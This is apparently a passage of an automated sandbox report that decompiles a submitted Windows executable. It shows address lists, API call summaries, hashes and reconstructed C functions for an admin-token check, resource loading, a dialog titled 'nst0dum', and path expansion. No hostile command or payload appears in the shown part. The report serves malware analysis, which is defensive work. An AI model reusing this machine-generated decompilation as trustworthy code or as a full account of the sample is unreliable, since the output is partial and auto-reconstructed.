                                                                                                                                                                                                    0x001318ab
                                                                                                                                                                                                    0x001318b2
                                                                                                                                                                                                    0x001318b5
                                                                                                                                                                                                    0x001318be
                                                                                                                                                                                                    0x001318c0
                                                                                                                                                                                                    0x001318c6
                                                                                                                                                                                                    0x001318c7
                                                                                                                                                                                                    0x001318ca
                                                                                                                                                                                                    0x001318cf
                                                                                                                                                                                                    0x001319c9
                                                                                                                                                                                                    0x001319d8
                                                                                                                                                                                                    0x001319d8
                                                                                                                                                                                                    0x001318df
                                                                                                                                                                                                    0x001319b8
                                                                                                                                                                                                    0x001319bd
                                                                                                                                                                                                    0x001319bf
                                                                                                                                                                                                    0x001319bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001319bd
                                                                                                                                                                                                    0x001318fa
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131912
                                                                                                                                                                                                    0x001319aa
                                                                                                                                                                                                    0x001319ad
                                                                                                                                                                                                    0x001319b3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131927
                                                                                                                                                                                                    0x00131927
                                                                                                                                                                                                    0x00131932
                                                                                                                                                                                                    0x00131936
                                                                                                                                                                                                    0x001319a9
                                                                                                                                                                                                    0x001319a9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001319a9
                                                                                                                                                                                                    0x0013194c
                                                                                                                                                                                                    0x001319a2
                                                                                                                                                                                                    0x001319a3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013196e
                                                                                                                                                                                                    0x00131970
                                                                                                                                                                                                    0x00131999
                                                                                                                                                                                                    0x0013199c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013199c
                                                                                                                                                                                                    0x00131972
                                                                                                                                                                                                    0x00131972
                                                                                                                                                                                                    0x00131975
                                                                                                                                                                                                    0x00131984
                                                                                                                                                                                                    0x00131985
                                                                                                                                                                                                    0x0013198a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013198c
                                                                                                                                                                                                    0x00131991
                                                                                                                                                                                                    0x00131996
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131996
                                                                                                                                                                                                    0x0013194c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 001317EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001318DD), ref: 0013181A
                                                                                                                                                                                                      • Part of subcall function 001317EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0013182C
                                                                                                                                                                                                      • Part of subcall function 001317EE: AllocateAndInitializeSid.ADVAPI32(001318DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001318DD), ref: 00131855
                                                                                                                                                                                                      • Part of subcall function 001317EE: FreeSid.ADVAPI32(?,?,?,?,001318DD), ref: 00131883
                                                                                                                                                                                                      • Part of subcall function 001317EE: FreeLibrary.KERNEL32(00000000,?,?,?,001318DD), ref: 0013188A
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 001318EB
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 001318F2
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0013190A
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00131918
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,?,?), ref: 0013192C
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00131944
                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00131964
                                                                                                                                                                                                    • EqualSid.ADVAPI32(00000004,?), ref: 0013197A
                                                                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 0013199C
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 001319A3
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 001319AD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2168512254-0
                                                                                                                                                                                                    • Opcode ID: d1872409125b375792f17fa3d196e8f51d7b228486bf4133fbf0cf69051ec2d1
                                                                                                                                                                                                    • Instruction ID: 80fb219690d8e7948ec90ec67006d2604dbac63b34738a817a750be045ee40ca
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1872409125b375792f17fa3d196e8f51d7b228486bf4133fbf0cf69051ec2d1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D310971A00209BFDB209FA5DC98AAFBBBCFF08714F504429F585D2160DB319955CB61
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E0013468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				CHAR* _t14;
                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                    				long _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t14 = __ecx;
                                                                                                                                                                                                    				_t11 = __edx;
                                                                                                                                                                                                    				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                    				_t16 = _t4;
                                                                                                                                                                                                    				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                    					if(_t16 == 0) {
                                                                                                                                                                                                    						L5:
                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                    					FreeResource(_t15);
                                                                                                                                                                                                    					return _t16;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t4;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x00134699
                                                                                                                                                                                                    0x0013469b
                                                                                                                                                                                                    0x001346a9
                                                                                                                                                                                                    0x001346af
                                                                                                                                                                                                    0x001346b4
                                                                                                                                                                                                    0x001346bc
                                                                                                                                                                                                    0x001346f9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001346f9
                                                                                                                                                                                                    0x001346d9
                                                                                                                                                                                                    0x001346dd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001346e5
                                                                                                                                                                                                    0x001346ef
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001346f5
                                                                                                                                                                                                    0x001346ff

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346A0
                                                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346A9
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346C3
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346CC
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346D3
                                                                                                                                                                                                    • memcpy_s.MSVCRT ref: 001346E5
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001346EF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                    • String ID: TITLE$nst0dum
                                                                                                                                                                                                    • API String ID: 3370778649-1250357435
                                                                                                                                                                                                    • Opcode ID: a8d4bccaffe46535eea34181cf3b2ddabc706a1771cef8b83fdc34caf19d75a3
                                                                                                                                                                                                    • Instruction ID: c166e6b35abfbbdecb06ce3de2d1f08c7f08fdf218e5767775543589e664c09e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8d4bccaffe46535eea34181cf3b2ddabc706a1771cef8b83fdc34caf19d75a3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB01A4762443107BE3201BA56C4EF6B7E2CDFCAF62F840014FB8997191CAB1988586B6
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                                                    			E001317EE(intOrPtr* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				short _v12;
                                                                                                                                                                                                    				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                    				void* _t35;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				signed int _t38;
                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t14 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                    				_v12 = 0x500;
                                                                                                                                                                                                    				_t37 = __ecx;
                                                                                                                                                                                                    				_v16.Value = 0;
                                                                                                                                                                                                    				_v28 = __ecx;
                                                                                                                                                                                                    				_t28 = 0;
                                                                                                                                                                                                    				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                                                                    					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                    					_v20 = _t20;
                                                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                                                    						 *_t37 = 0;
                                                                                                                                                                                                    						_t28 = 1;
                                                                                                                                                                                                    						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                    							_t37 = _t39;
                                                                                                                                                                                                    							 *0x13a288(0, _v24, _v28);
                                                                                                                                                                                                    							_v20();
                                                                                                                                                                                                    							if(_t39 != _t39) {
                                                                                                                                                                                                    								asm("int 0x29");
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							FreeSid(_v24);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					FreeLibrary(_t36);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00136CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x001317f6
                                                                                                                                                                                                    0x001317fd
                                                                                                                                                                                                    0x00131805
                                                                                                                                                                                                    0x0013180b
                                                                                                                                                                                                    0x0013180d
                                                                                                                                                                                                    0x00131815
                                                                                                                                                                                                    0x00131818
                                                                                                                                                                                                    0x00131820
                                                                                                                                                                                                    0x00131824
                                                                                                                                                                                                    0x0013182c
                                                                                                                                                                                                    0x00131832
                                                                                                                                                                                                    0x00131837
                                                                                                                                                                                                    0x00131851
                                                                                                                                                                                                    0x00131854
                                                                                                                                                                                                    0x0013185d
                                                                                                                                                                                                    0x00131862
                                                                                                                                                                                                    0x0013186c
                                                                                                                                                                                                    0x00131872
                                                                                                                                                                                                    0x00131877
                                                                                                                                                                                                    0x0013187e
                                                                                                                                                                                                    0x0013187e
                                                                                                                                                                                                    0x00131883
                                                                                                                                                                                                    0x00131883
                                                                                                                                                                                                    0x0013185d
                                                                                                                                                                                                    0x0013188a
                                                                                                                                                                                                    0x0013188a
                                                                                                                                                                                                    0x001318a2

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001318DD), ref: 0013181A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0013182C
                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(001318DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001318DD), ref: 00131855
                                                                                                                                                                                                    • FreeSid.ADVAPI32(?,?,?,?,001318DD), ref: 00131883
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,001318DD), ref: 0013188A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                    • API String ID: 4204503880-1888249752
                                                                                                                                                                                                    • Opcode ID: 08a99711796522a1e77c54e57ce98e3ca969caac70621c03c45f4da2c857e3b8
                                                                                                                                                                                                    • Instruction ID: f4e224e3f19b3f3bc337f1c7142674bfc3de73ec6a9d875ebec38debedd4319f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08a99711796522a1e77c54e57ce98e3ca969caac70621c03c45f4da2c857e3b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3311B271E00209BFDB149FA4EC49ABEBBB8EF48701F500169FA45E3290DB309D418B95
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00133450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				struct HWND__* _t12;
                                                                                                                                                                                                    				int _t22;
                                                                                                                                                                                                    				struct HWND__* _t24;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t7 = _a8 - 0x10;
                                                                                                                                                                                                    				if(_t7 == 0) {
                                                                                                                                                                                                    					EndDialog(_a4, 2);
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t11 = _t7 - 0x100;
                                                                                                                                                                                                    				if(_t11 == 0) {
                                                                                                                                                                                                    					_t12 = GetDesktopWindow();
                                                                                                                                                                                                    					_t24 = _a4;
                                                                                                                                                                                                    					E001343D0(_t24, _t12);
                                                                                                                                                                                                    					SetWindowTextA(_t24, "nst0dum");
                                                                                                                                                                                                    					SetDlgItemTextA(_t24, 0x838,  *0x139404);
                                                                                                                                                                                                    					SetForegroundWindow(_t24);
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t11 == 1) {
                                                                                                                                                                                                    					_t22 = _a12;
                                                                                                                                                                                                    					if(_t22 < 6) {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t22 <= 7) {
                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                    						EndDialog(_a4, _t22);
                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t22 != 0x839) {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0x1391dc = 1;
                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x00133459
                                                                                                                                                                                                    0x0013345c
                                                                                                                                                                                                    0x001334d8
                                                                                                                                                                                                    0x001334de
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001334e0
                                                                                                                                                                                                    0x0013345e
                                                                                                                                                                                                    0x00133463
                                                                                                                                                                                                    0x0013349a
                                                                                                                                                                                                    0x001334a0
                                                                                                                                                                                                    0x001334a7
                                                                                                                                                                                                    0x001334b2
                                                                                                                                                                                                    0x001334c4
                                                                                                                                                                                                    0x001334cb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001334cb
                                                                                                                                                                                                    0x00133468
                                                                                                                                                                                                    0x0013346e
                                                                                                                                                                                                    0x00133474
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013347c
                                                                                                                                                                                                    0x0013348c
                                                                                                                                                                                                    0x00133490
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133496
                                                                                                                                                                                                    0x00133484
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133486
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133486
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00133490
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0013349A
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 001334B2
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000838), ref: 001334C4
                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 001334CB
                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 001334D8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                    • String ID: nst0dum
                                                                                                                                                                                                    • API String ID: 852535152-432003757
                                                                                                                                                                                                    • Opcode ID: 0d73a0dcfc01b6536fcca301c769946e307fb6709c9da55ad06d3aea81b682b0
                                                                                                                                                                                                    • Instruction ID: 9ff6d673934f57fdc2daf560bd536017aca71a908a7a5cb09d9ce611d2353c58
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d73a0dcfc01b6536fcca301c769946e307fb6709c9da55ad06d3aea81b682b0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A01F231240124ABCB1A5F69DC0C9AE7B64EF09710F408010FAAB96DA1CB719F82DBD9
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                    			E00132AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t16;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				char _t32;
                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                    				char* _t38;
                                                                                                                                                                                                    				char _t42;
                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                    				CHAR* _t52;
                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                    				CHAR* _t59;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				CHAR* _t64;
                                                                                                                                                                                                    				CHAR* _t65;
                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t60 = __edx;
                                                                                                                                                                                                    				_t16 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                    				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                    				_t65 = _a4;
                                                                                                                                                                                                    				_t44 = __edx;
                                                                                                                                                                                                    				_t64 = __ecx;
                                                                                                                                                                                                    				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                    					GetModuleFileNameA( *0x139a3c,  &_v268, 0x104);
                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                    						_t17 =  *_t64;
                                                                                                                                                                                                    						if(_t17 == 0) {
                                                                                                                                                                                                    							break;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                    						 *_t65 =  *_t64;
                                                                                                                                                                                                    						if(_t21 != 0) {
                                                                                                                                                                                                    							_t65[1] = _t64[1];
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if( *_t64 != 0x23) {
                                                                                                                                                                                                    							L19:
                                                                                                                                                                                                    							_t65 = CharNextA(_t65);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t64 = CharNextA(_t64);
                                                                                                                                                                                                    							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                    								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                    									if( *_t64 == 0x23) {
                                                                                                                                                                                                    										goto L19;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E00131680(_t65, E001317C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                    									_t52 = _t65;
                                                                                                                                                                                                    									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                    									_t60 = _t14;
                                                                                                                                                                                                    									do {
                                                                                                                                                                                                    										_t32 =  *_t52;
                                                                                                                                                                                                    										_t52 =  &(_t52[1]);
                                                                                                                                                                                                    									} while (_t32 != 0);
                                                                                                                                                                                                    									goto L17;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								E001365E8( &_v268);
                                                                                                                                                                                                    								_t55 =  &_v268;
                                                                                                                                                                                                    								_t62 = _t55 + 1;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t34 =  *_t55;
                                                                                                                                                                                                    									_t55 = _t55 + 1;
                                                                                                                                                                                                    								} while (_t34 != 0);
                                                                                                                                                                                                    								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                    								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                    									 *_t38 = 0;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								E00131680(_t65, E001317C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                    								_t59 = _t65;
                                                                                                                                                                                                    								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                    								_t60 = _t12;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t42 =  *_t59;
                                                                                                                                                                                                    									_t59 =  &(_t59[1]);
                                                                                                                                                                                                    								} while (_t42 != 0);
                                                                                                                                                                                                    								L17:
                                                                                                                                                                                                    								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t64 = CharNextA(_t64);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *_t65 = _t17;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00136CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                    			}






















                                                                                                                                                                                                    0x00132aac
                                                                                                                                                                                                    0x00132ab7
                                                                                                                                                                                                    0x00132abc
                                                                                                                                                                                                    0x00132abe
                                                                                                                                                                                                    0x00132ac3
                                                                                                                                                                                                    0x00132ac6
                                                                                                                                                                                                    0x00132ac9
                                                                                                                                                                                                    0x00132ace
                                                                                                                                                                                                    0x00132ae6
                                                                                                                                                                                                    0x00132bdc
                                                                                                                                                                                                    0x00132bdc
                                                                                                                                                                                                    0x00132be0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132af2
                                                                                                                                                                                                    0x00132afc
                                                                                                                                                                                                    0x00132b00
                                                                                                                                                                                                    0x00132b05
                                                                                                                                                                                                    0x00132b05
                                                                                                                                                                                                    0x00132b0b
                                                                                                                                                                                                    0x00132bca
                                                                                                                                                                                                    0x00132bd1
                                                                                                                                                                                                    0x00132b11
                                                                                                                                                                                                    0x00132b18
                                                                                                                                                                                                    0x00132b26
                                                                                                                                                                                                    0x00132b99
                                                                                                                                                                                                    0x00132bc8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132b9b
                                                                                                                                                                                                    0x00132bae
                                                                                                                                                                                                    0x00132bb3
                                                                                                                                                                                                    0x00132bb5
                                                                                                                                                                                                    0x00132bb5
                                                                                                                                                                                                    0x00132bb8
                                                                                                                                                                                                    0x00132bb8
                                                                                                                                                                                                    0x00132bba
                                                                                                                                                                                                    0x00132bbb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132bb8
                                                                                                                                                                                                    0x00132b28
                                                                                                                                                                                                    0x00132b2e
                                                                                                                                                                                                    0x00132b33
                                                                                                                                                                                                    0x00132b39
                                                                                                                                                                                                    0x00132b3c
                                                                                                                                                                                                    0x00132b3c
                                                                                                                                                                                                    0x00132b3e
                                                                                                                                                                                                    0x00132b3f
                                                                                                                                                                                                    0x00132b55
                                                                                                                                                                                                    0x00132b5d
                                                                                                                                                                                                    0x00132b64
                                                                                                                                                                                                    0x00132b64
                                                                                                                                                                                                    0x00132b7a
                                                                                                                                                                                                    0x00132b7f
                                                                                                                                                                                                    0x00132b81
                                                                                                                                                                                                    0x00132b81
                                                                                                                                                                                                    0x00132b84
                                                                                                                                                                                                    0x00132b84
                                                                                                                                                                                                    0x00132b86
                                                                                                                                                                                                    0x00132b87
                                                                                                                                                                                                    0x00132bbf
                                                                                                                                                                                                    0x00132bc1
                                                                                                                                                                                                    0x00132bc1
                                                                                                                                                                                                    0x00132b26
                                                                                                                                                                                                    0x00132bda
                                                                                                                                                                                                    0x00132bda
                                                                                                                                                                                                    0x00132be6
                                                                                                                                                                                                    0x00132be6
                                                                                                                                                                                                    0x00132bf8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00132AE6
